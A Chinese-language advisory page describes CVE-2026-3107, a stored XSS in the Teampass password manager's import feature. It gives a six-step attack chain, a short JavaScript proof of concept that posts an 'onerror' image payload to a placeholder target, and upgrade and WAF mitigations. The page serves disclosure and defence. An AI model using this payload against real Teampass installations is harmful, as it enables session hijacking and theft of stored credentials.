CVE-2026-3107 CVSS 5.4 中危

CVE-2026-3107 Teampass 存储型XSS漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3107

漏洞类型

存储型跨站脚本 (XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Teampass

漏洞概述

Teampass密码管理器在3.1.5.16之前的版本中存在存储型跨站脚本（XSS）漏洞。该漏洞源于密码导入功能未能正确过滤用户输入数据，允许攻击者注入恶意JavaScript代码。这些代码被持久化存储在数据库中，当其他用户或管理员访问特定页面查看导入的密码时，攻击者注入的脚本将被触发执行，进而导致会话劫持、凭证窃取及系统完整性受损。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS），影响Teampass 3.1.5.16之前的版本。漏洞根源在于应用程序的密码导入功能（endpoint: `redacted/index.php?page=items`）未对用户提交的数据进行有效的净化和上下文相关的编码。攻击者可利用低权限账户，通过导入功能构造包含恶意JavaScript代码的Payload。由于后端直接将未过滤的输入持久化存储至数据库，当管理员或其他高权限用户访问包含该数据的页面时，恶意脚本会在其浏览器上下文中自动执行。这种攻击方式绕过了传统的同源策略限制，结合CVSS向量中的S:C（Scope Changed），攻击者能够利用受害者的会话令牌进行提权、窃取敏感凭证或执行未授权操作，严重威胁密码管理器的安全性。

攻击链分析

STEP 1

1. 获取访问权限

攻击者注册或获取一个低权限账户（PR:L），因为漏洞利用需要身份验证。

STEP 2

2. 构造恶意载荷

攻击者编写包含JavaScript代码的恶意Payload，旨在窃取Cookie或执行管理员操作。

STEP 3

3. 提交恶意数据

攻击者利用密码导入功能（endpoint: index.php?page=items），将包含恶意代码的密码数据导入系统。

STEP 4

4. 数据持久化存储

由于应用程序未对导入数据进行适当的过滤和编码，恶意Payload被存储在数据库中。

STEP 5

5. 触发漏洞

当管理员或其他用户登录并浏览包含被导入密码的页面时，恶意脚本在其浏览器中执行。

STEP 6

6. 执行攻击

脚本利用受害者的会话上下文，窃取凭证、劫持会话或执行未授权的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/**
 * PoC for CVE-2026-3107 (Teampass Stored XSS)
 * This script demonstrates how to send a malicious payload
 * via the import functionality.
 */

const targetUrl = 'http://target-teampass.com/index.php';
const maliciousPayload = '<img src=x onerror=alert(1)>';

// Simulate the import request data
const exploitData = {
    page: 'items',
    action: 'import',
    // The payload is injected into a field that is not sanitized
    items_to_import: JSON.stringify([
        {
            label: 'Admin Password',
            password: maliciousPayload,
            description: 'XSS Payload'
        }
    ])
};

fetch(targetUrl, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': 'PHPSESSID=valid_session_id_here'
    },
    body: new URLSearchParams(exploitData)
}).then(response => console.log('Payload sent, status:', response.status));

影响范围

Teampass < 3.1.5.16

防御指南

临时缓解措施

建议立即升级Teampass至3.1.5.16或更高版本以修复此漏洞。在升级前，建议限制低权限用户使用密码导入功能，并在Web应用防火墙（WAF）中部署针对存储型XSS的检测规则，过滤常见的恶意JavaScript关键字（如<script>, onerror, onmouseover等）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表